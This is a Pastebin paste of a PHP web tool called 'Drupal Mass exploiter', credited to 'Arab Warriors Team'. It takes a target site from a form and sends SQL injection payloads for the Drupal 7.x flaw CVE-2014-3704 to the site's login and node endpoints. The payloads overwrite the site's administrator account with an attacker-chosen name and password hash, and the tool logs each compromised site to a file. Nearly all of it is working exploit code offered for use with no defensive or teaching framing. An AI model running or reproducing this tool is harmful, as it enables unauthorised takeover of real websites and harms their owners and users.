Advertisement
HackMe

Drupal Mass exploiter

Jun 3rd, 2015
705
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.82 KB | None | 0 0
  1. <?php ?> <!Doctype HTML>
  2. <html>
  3. <head>
  4. <title>Drupal Exploiter Algeria Hackers</title>
  5. <body style="background:#000 url(http://www.sos-web.ca/wp-content/uploads/2013/06/drupal-icon.png) no-repeat center center fixed;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover" bgcolor="#000" marginheight="0" marginwidth="0">
  6. <style type="text/css">
  7. .mymargin{
  8. margin-top:100px;
  9. color:white;
  10. font-family: monospace;
  11. }
  12. body{
  13. background-color:black;
  14. }
  15. </style>
  16. </head>
  17. <body>
  18. <link href='http://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet'
  19. type='text/css'>
  20. <link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>
  21. <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
  22. <div class="mymargin">
  23. <center>
  24. <center><font size="10" color="blue"><font face="Iceland"> Drupal Exploiter By Arab Warriors Team</font></center></font size="7" color="white"><br>
  25. <hr size=3 width=38% color="darkcyan" align=center>
  26. <font size='4' color="blue" face="Orbitron"/>
  27. Drupal : 7.31 ! <br>
  28. <form method="GET" action="">
  29. Site : <input type="text" name="url" placeholder="Example: www.site.com">
  30. <input type="submit" name="submit" value="submit">
  31. </form>
  32. <br>
  33. <font size='4' color="blue" face="Orbitron"/>
  34. Drupal Exploit Priv8 By Arab Warriors Team <br>
  35. </div>
  36. <center><center>
  37. <?php
  38. #-----------------------------------------------------------------------------#
  39. # Exploit Title: Drupal core 7.x - SQL Injection #
  40. # Date: Oct 16 2014 #
  41. # Exploit Author: Dustin D&#1043;rr #
  42. # Software Link: http://www.drupal.com/ #
  43. # Version: Drupal core 7.x versions prior to 7.32 #
  44. # CVE: CVE-2014-3704 #
  45. #-----------------------------------------------------------------------------#
  46. $file = fopen("Drupal.txt", "a");
  47. error_reporting(0);
  48. if (isset($_GET['submit'])) {
  49. $url = "http://" . $_GET['url'];
  50. $post_data = "name[0;update users set name %3D 'riad' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  51. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  52. ", 'content' => $post_data));
  53. $ctx = stream_context_create($params);
  54. $data = file_get_contents($url . '/user/login/', null, $ctx);
  55. echo "<h4>Scanning at \"/user/login/</h4>\"";
  56. if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  57. $fp = fopen("Drupal.txt", 'a');
  58. echo "Success! User:AWT Pass:admin at {$url}/user/login <br>";
  59. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/Drupal.txt" target="_blank">[ Drupal.txt ]</a></font> ';
  60. fwrite($fp, "Succes! User:AWT Pass:admin -> {$url}/user/login");
  61. fwrite($fp, "
  62. ");
  63. fwrite($fp, "---------------------A.W.T------------------------------");
  64. fwrite($fp, "
  65. ");
  66. fclose($fp);
  67. } else {
  68. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  69. }
  70. }
  71. if (isset($_GET['submit'])) {
  72. $url = "http://" . $_GET['url'] . "/";
  73. $post_data = "name[0;update users set name %3D 'AWT' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  74. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  75. ", 'content' => $post_data));
  76. $ctx = stream_context_create($params);
  77. $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
  78. echo "<h4>Scanning at \"Index</h4>\"";
  79. if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  80. $fp = fopen("Drupal.txt", 'a');
  81. echo "Success! User:AWT Pass:admin at {$url}/user/login <br>";
  82. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/Drupal.txt" target="_blank">[ Drupal.txt ]</a></font> ';
  83. fwrite($fp, "Success! User:AWT Pass:admin -> {$url}/user/login");
  84. fwrite($fp, "
  85. ");
  86. fwrite($fp, "---------------------El Moujahidin------------------------------");
  87. fwrite($fp, "
  88. ");
  89. fclose($fp);
  90. } else {
  91. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
  92. }
  93. }
  94. ?>
  95. </body>
  96. </html> <?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement